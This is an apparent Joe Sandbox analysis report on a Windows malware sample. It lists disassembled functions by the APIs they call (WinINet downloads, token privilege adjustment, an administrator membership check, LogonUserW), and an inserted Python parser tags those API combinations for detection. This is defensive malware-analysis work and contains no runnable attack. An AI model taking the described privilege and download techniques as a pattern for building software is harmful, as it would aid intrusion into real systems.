                                                    • Instruction ID: e66f5e554d7432aaa53a42efc8a44edadfe5014f93957e4df229970a7cf537a7
                                                    • Opcode Fuzzy Hash: cb9cdd3ec9572cb723df8eb2d53577cc5edc9488a1bb1186039745afbab3e2f4
                                                    • Instruction Fuzzy Hash: 1C323375A007019FDB28DF59C4809AAB7F2FF48320B15C46EE89ACB3A1E771E941CB54
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006C180A,00000000), ref: 006C23E1
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006C2418
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: 3bda61addd43b2793c406b087dc1428525cee64c354b0d65e04db09a586e924b
                                                    • Instruction ID: 0591b52e19f873531ded4c197dc501d6d542482e520c819493a9dbc1c093a606
                                                    • Opcode Fuzzy Hash: 3bda61addd43b2793c406b087dc1428525cee64c354b0d65e04db09a586e924b
                                                    • Instruction Fuzzy Hash: 1241E37190420AFFEB10DE95DC95FFB77EEEB40714F10806EFA09A6240EA749E419664
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BB343
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006BB39D
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006BB3EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 3234ca737de88270296c6abbdc6b3f2da1482e17aed5647ecc73296ce06375f1
                                                    • Instruction ID: 5158d225004229b3f6f0712375d086ddc3bea495aedecb7b671baa81f55aaad9
                                                    • Opcode Fuzzy Hash: 3234ca737de88270296c6abbdc6b3f2da1482e17aed5647ecc73296ce06375f1
                                                    • Instruction Fuzzy Hash: AC218E75A00118EFCB00EFA5D880AEDBBB9FF49310F0480AAE905AB351CB319959CF54
                                                    APIs
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
                                                    • GetLastError.KERNEL32 ref: 006A8865
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: 5afc3e4bdcf345bbf401735777924ea2d10008cd335c01b516a98e9eca0e8bdb
                                                    • Instruction ID: df2556623bad41e2b36bdb113863f5a21e0f0d1f04da8a96974db7131a6ed744
                                                    • Opcode Fuzzy Hash: 5afc3e4bdcf345bbf401735777924ea2d10008cd335c01b516a98e9eca0e8bdb
                                                    • Instruction Fuzzy Hash: 90116DB2814305AFE728EFA4DC85D6BB7EEEB45710B20852EE45697241EE34AC418B60
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006A8774
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006A878B
                                                    • FreeSid.ADVAPI32(?), ref: 006A879B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 8cf72e1ded6df46f9ba779ed8265550c91f7bf0d1ead5dcace1145785ab7d5b2
                                                    • Instruction ID: 7f798b351efe77609fe99f5d210c767f878b41c0a6b155323b2fe7c3a279456a
                                                    • Opcode Fuzzy Hash: 8cf72e1ded6df46f9ba779ed8265550c91f7bf0d1ead5dcace1145785ab7d5b2
                                                    • Instruction Fuzzy Hash: 6BF03C75D11208BFDB00DFE49C99ABDB7B9EF08201F504469A502E3281D6715A448B50
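The two function blocks above (LookupPrivilegeValueW / AdjustTokenPrivileges / GetLastError, and AllocateAndInitializeSid / CheckTokenMembership / FreeSid) are the kind of API grouping an analyst wants pulled out of a report like this automatically rather than by scrolling. The following Python is an added example, not Joe Sandbox output or code: it parses the report's per-function blocks (the "APIs", "Memory Dump Source" and "Similarity" lists), strips the "Download File" link label that the HTML export appends to each Associated entry, and tags blocks whose call set matches a few hand-written heuristics. The RID constants 0x20 and 0x220 are SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS from winnt.h; the FuncBlock type, the tag names and the heuristics are the example's own, and SAMPLE is an abridged copy of the two blocks above used as offline input.

```python
# Added example (not Joe Sandbox code): parse the per-function "APIs" / "Memory Dump
# Source" / "Similarity" blocks of a Joe Sandbox report and tag API combinations.
from __future__ import annotations
import re
from dataclasses import dataclass, field

BULLET = "\u2022"
# "Name.MODULE(args), ref: addr", optionally prefixed "Part of subcall function X: ";
# unresolved arguments print as "?".
API_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+: )?"
    r"(?P<name>[\w:@$~.]+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s?(?P<val>.*)$")
# Well-known RIDs (winnt.h); AllocateAndInitializeSid(authority, count, rid0, rid1, ...)
SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS = 0x20, 0x220

@dataclass
class FuncBlock:
    apis: list[tuple[str, str, list[str], str]] = field(default_factory=list)  # (name, module, args, ref)
    fields: dict[str, str] = field(default_factory=dict)
    associated: list[str] = field(default_factory=list)

    def names(self) -> set[str]:
        return {name for name, _, _, _ in self.apis}

def parse_blocks(text: str) -> list[FuncBlock]:
    blocks, cur, section = [], None, None  # a block is closed by its Instruction Fuzzy Hash
    for raw in text.splitlines():
        line = raw.strip().lstrip(BULLET).strip()
        if not line:
            continue
        if line == "APIs":
            cur, section = FuncBlock(), "apis"
        elif line == "Memory Dump Source":
            cur, section = cur or FuncBlock(), "fields"  # functions without API calls start here
        elif line in ("Strings", "Joe Sandbox IDA Plugin", "Similarity"):
            section = "fields"
        elif cur is not None and section == "apis":
            if m := API_RE.match(line):
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append((m["name"], m["module"], args, m["ref"]))
        elif cur is not None and (m := FIELD_RE.match(line)):
            key, val = m["key"], m["val"].strip()
            if key == "Associated":  # drop the "Download File" link label the export glues on
                cur.associated.append(val.removesuffix("Download File"))
            else:
                cur.fields[key] = val
            if key == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = None
    return blocks

def _hex(s: str) -> int | None:
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]+", s) else None

def classify(b: FuncBlock) -> list[str]:
    names, tags = b.names(), []  # author's heuristics for the patterns seen in this report
    for name, _, args, _ in b.apis:
        if name == "AllocateAndInitializeSid" and "CheckTokenMembership" in names and \
                tuple(_hex(x) for x in args[1:4]) == (2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS):
            tags.append("is-admin check (BUILTIN\\Administrators)")
    if {"LookupPrivilegeValueW", "AdjustTokenPrivileges"} <= names:
        # AdjustTokenPrivileges returns TRUE even when nothing was granted; only
        # GetLastError reveals ERROR_NOT_ALL_ASSIGNED.
        tag = "enables token privilege"
        tags.append(tag if "GetLastError" in names else tag + " (result unchecked)")
    if "LogonUserW" in names:
        tags.append("logs on with explicit credentials")
    if "InternetReadFile" in names:
        tags.append("downloads via WinINet")
    return tags

def analyze(text: str) -> list[dict]:
    return [{"api_id": b.fields.get("API ID", ""), "calls": [f"{m}!{n}" for n, m, _, _ in b.apis],
             "tags": classify(b)} for b in parse_blocks(text)]

# Abridged copy of the two function blocks above, used as offline sample input.
SAMPLE = """\
APIs
  • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
• GetLastError.KERNEL32 ref: 006A8865
Memory Dump Source
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• Instruction Fuzzy Hash: 90116DB2814305AFE728EFA4DC85D6BB7EEEB45710B20852EE45697241EE34AC418B60
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006A8774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006A878B
• FreeSid.ADVAPI32(?), ref: 006A879B
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• Instruction Fuzzy Hash: 6BF03C75D11208BFDB00DFE49C99ABDB7B9EF08201F504469A502E3281D6715A448B50
"""
```

Running analyze(SAMPLE) tags the first block as enabling a token privilege, with the GetLastError call that follows AdjustTokenPrivileges noted as present (that call is the only way to see ERROR_NOT_ALL_ASSIGNED, since AdjustTokenPrivileges itself returns TRUE even when no privilege was granted), and the second as a BUILTIN\Administrators membership check, because the AllocateAndInitializeSid arguments 00000002,00000020,00000220 are the sub-authority count followed by the two well-known RIDs. The same parser runs over the full report text; the rules in classify are deliberately narrow and should be extended per case rather than trusted as a verdict.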
                                                    APIs
                                                    • __time64.LIBCMT ref: 006B889B
                                                      • Part of subcall function 0067520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006B8F6E,00000000,?,?,?,?,006B911F,00000000,?), ref: 00675213
                                                      • Part of subcall function 0067520A: __aulldiv.LIBCMT ref: 00675233
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID: 0eq
                                                    • API String ID: 2893107130-3835880138
                                                    • Opcode ID: a98b978b92b16fdb9ae34cce9932eab5c5188b8a17d967880557afe393c0156e
                                                    • Instruction ID: 33dad0db3af18aeae4b8990083fe260f6bc6e9904f11ba30890eafeb93ca4879
                                                    • Opcode Fuzzy Hash: a98b978b92b16fdb9ae34cce9932eab5c5188b8a17d967880557afe393c0156e
                                                    • Instruction Fuzzy Hash: 1C21B1726356108FC729CF29D841A92B3E6EFA5311B68CE6CD0F5CB2C0CA74B945CB58
                                                    APIs
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 006B4CB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 2434400541-711622031
                                                    • Opcode ID: 9b22f39b4765da049e97c9fe2d196eff4735547ec15ecec218cc73151595b66a
                                                    • Instruction ID: eb189b406e47b2ad15b3a53a541e82a3bb161f5175bd218dbc5c2c12ebdce255
                                                    • Opcode Fuzzy Hash: 9b22f39b4765da049e97c9fe2d196eff4735547ec15ecec218cc73151595b66a
                                                    • Instruction Fuzzy Hash: CAE086F219D7223CF9842618BC03EF7078D8B127357104246F814E51C2DE451CC325AC
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006BC6FB
                                                    • FindClose.KERNEL32(00000000), ref: 006BC72B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 0aea248f03a427cac685bb0ff3e9e5f36e9fccf0603880dee170dc3ff3a91a38
                                                    • Instruction ID: 5ca6a162d83e53a44d5c5ce7a572bd0d5c9cbb09a04a82351b058cd08ce62e7d
                                                    • Opcode Fuzzy Hash: 0aea248f03a427cac685bb0ff3e9e5f36e9fccf0603880dee170dc3ff3a91a38
                                                    • Instruction Fuzzy Hash: 5511A5716006009FDB10DF29C85596AF7E6FF45321F048A1EF9A5CB290DB30AD05CF95
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,006C9468,?,006DFB84,?), ref: 006BA097
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,006C9468,?,006DFB84,?), ref: 006BA0A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 95a1fa1c6802ed437b65b9bace52173c608e3171cdcc97b5b3f87274eefc5ab0
                                                    • Instruction ID: 7585e0d87ae6b484f5349f15577340a66f9a2d02f32f2fc71d1695a57a89490a
                                                    • Opcode Fuzzy Hash: 95a1fa1c6802ed437b65b9bace52173c608e3171cdcc97b5b3f87274eefc5ab0
                                                    • Instruction Fuzzy Hash: ADF0E23550522DBBDB20AFA4CC48FEA736EBF08361F00426AF809D6180C6309A40CBA1
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006A8309), ref: 006A81E0
                                                    • CloseHandle.KERNEL32(?,?,006A8309), ref: 006A81F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: fb4f6da4edc2c2d97be00caffaf7594b10e8dfda4dff16cf4fb484595e124c1e
                                                    • Instruction ID: 8fb14c99fb938b8f371fafa62ed6fe528a0834115e3f6530ce493bc8890342a7
                                                    • Opcode Fuzzy Hash: fb4f6da4edc2c2d97be00caffaf7594b10e8dfda4dff16cf4fb484595e124c1e
                                                    • Instruction Fuzzy Hash: FAE08C32001A11EFF7212B20EC08D737BEBEF00310714C82EF8AA80430CB22AC90DB60
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00678D57,?,?,?,00000001), ref: 0067A15A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0067A163
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 4e4dc6553db30eb5a39efbba84e3bd979809a93da6eddfa2a36a4b719be33350
                                                    • Instruction ID: a56d2f2bf35eee2812ecab3a921bb16622b54cce86ecaa3eb58277901477a0f3
                                                    • Opcode Fuzzy Hash: 4e4dc6553db30eb5a39efbba84e3bd979809a93da6eddfa2a36a4b719be33350
                                                    • Instruction Fuzzy Hash: E7B09231455208ABCB002B95EC09B883F6AEB44AA2F429022F60E84060CF6254508AD1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9f8b30af45c62f0f5d61847eeef1aecfe7bc98884121b7fe4bd6194632acff2
                                                    • Instruction ID: 9ebdd5fe2498d872a538d9fe57ce59f46a1302b8b8de9e3017cd9be10f5d5e8c
                                                    • Opcode Fuzzy Hash: c9f8b30af45c62f0f5d61847eeef1aecfe7bc98884121b7fe4bd6194632acff2
                                                    • Instruction Fuzzy Hash: 46321622D29F414DD7639A34D872336A25AAFB73C4F15D737F81AB9AA5EB29C4834100
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6fdf5d3bf64598fdffaf8162dcedb5b2c2ae489d37a3a1330d511170de2189d9
                                                    • Instruction ID: 607cb2262753a5e12b1efd27226981a15b6f292d608780ae00d5a5dd78c5f99e
                                                    • Opcode Fuzzy Hash: 6fdf5d3bf64598fdffaf8162dcedb5b2c2ae489d37a3a1330d511170de2189d9
                                                    • Instruction Fuzzy Hash: 6BB12330D2AF814DD32396398871336B69DAFBB2C5F52E71BFC1674D62EB2195834241
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006A8389), ref: 006A87D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: ea9ff579df30263cceb23f0a4615e97e57410770e43769733ace04ba67fe2dde
                                                    • Instruction ID: 18e9a6d304c3c2378e32407b3a82ab543a13499a195027a6d8f3d7b10c41c67c
                                                    • Opcode Fuzzy Hash: ea9ff579df30263cceb23f0a4615e97e57410770e43769733ace04ba67fe2dde
                                                    • Instruction Fuzzy Hash: 22D09E3226450EABEF019FA4DD05EBE3B6AEB04B01F408511FE16D61A1C775D935AB60
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0067A12A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 7f8642122c5412819d434bc11e6b7155b612cb1b2cf1f240f27910128a85c00c
                                                    • Instruction ID: 5a25bd8b95388497204cc55ae1577e614ddf8e814b5708a76a623ee28e9d0870
                                                    • Opcode Fuzzy Hash: 7f8642122c5412819d434bc11e6b7155b612cb1b2cf1f240f27910128a85c00c
                                                    • Instruction Fuzzy Hash: A9A0243000010CF7CF001F45FC044447F5DD7001D07014031F40D40031CF33541045C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2197d48d5c3b414a40d71d7f1562e00bf1634dd0239b765c534867b631d072bd
                                                    • Instruction ID: b88e6ade24b050ed4807a9352bde134eb63584e7aa57eb0aff1f51d43b313bf0
                                                    • Opcode Fuzzy Hash: 2197d48d5c3b414a40d71d7f1562e00bf1634dd0239b765c534867b631d072bd
                                                    • Instruction Fuzzy Hash: 34223530A04506CFDF28DA78C4947BC77A3FF42344F28836BE9469B692DB759D92CA41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
